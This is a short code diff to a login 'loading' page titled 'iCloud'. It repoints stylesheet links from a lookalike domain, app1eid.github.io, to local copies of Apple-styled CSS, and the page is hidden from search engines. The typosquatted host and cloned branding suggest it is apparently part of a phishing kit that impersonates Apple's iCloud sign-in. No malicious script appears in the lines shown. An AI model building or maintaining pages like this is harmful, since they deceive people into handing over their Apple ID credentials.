--- a/login/loading/index.html
+++ b/login/loading/index.html
@@ -7,11 +7,11 @@
 	<meta name="robots" content="noindex, nofollow">
 	<title>iCloud</title>
 
-	<link rel="stylesheet" href="view-source:https://app1eid.github.io/icloud.com-id94131201/index_files/apple.css">
+	<link rel="stylesheet" href="./index_files/apple.css">
 
 
 
-	<link rel="stylesheet" href="view-source:https://app1eid.github.io/icloud.com-id94131201/index_files/loading.css">
+	<link rel="stylesheet" href="./index_files/loading.css">
 </head>
 <body>
 
